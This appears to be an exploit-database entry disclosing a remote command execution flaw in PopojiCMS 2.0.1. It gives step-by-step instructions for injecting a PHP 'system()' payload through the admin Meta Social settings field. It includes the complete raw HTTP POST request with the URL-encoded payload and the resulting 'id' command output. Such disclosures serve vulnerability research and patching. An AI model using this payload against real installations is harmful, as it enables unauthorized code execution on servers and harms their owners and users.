Popojicms version 2.0.1 remote command execution Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2024-04-12 |
Type : webapps |
Platform : php
[+] Code ...
# Exploit Title: PopojiCMS Version : 2.0.1 Remote Command Execution
# Date: 27/11/2023
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.popojicms.org/
# Software Link: https://github.com/PopojiCMS/PopojiCMS/archive/refs/tags/v2.0.1.zip
# Version: Version : 2.0.1
# Tested on: https://www.softaculous.com/apps/cms/PopojiCMS
##POC:
1 ) Login with admin cred and click settings
2 ) Click on config , write your payload in Meta Social > <?php echo system('id'); ?>
3 ) Open main page , you will be see id command result
POST /PopojiCMS9zl3dxwbzt/po-admin/route.php?mod=setting&act=metasocial HTTP/1.1
Host: demos5.softaculous.com
Cookie: _ga_YYDPZ3NXQQ=GS1.1.1701095610.3.1.1701096569.0.0.0; _ga=GA1.1.386621536.1701082112; AEFCookies1526[aefsid]=3cbt9mdj1kpi06aj1q5r8yhtgouteb5s; PHPSESSID=b6f1f9beefcec94f09824efa9dae9847; lang=gb; demo_563=%7B%22sid%22%3A563%2C%22adname%22%3A%22admin%22%2C%22adpass%22%3A%22password%22%2C%22url%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%22%2C%22adminurl%22%3A%22http%3A%5C%2F%5C%2Fdemos5.softaculous.com%5C%2FPopojiCMS9zl3dxwbzt%5C%2Fpo-admin%5C%2F%22%2C%22dir_suffix%22%3A%229zl3dxwbzt%22%7D
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://demos5.softaculous.com/PopojiCMS9zl3dxwbzt/po-admin/admin.php?mod=setting
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Origin: https://demos5.softaculous.com
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
meta_content=%3C%3Fphp+echo+system%28%27id%27%29%3B+%3F%3E
Result:
uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft)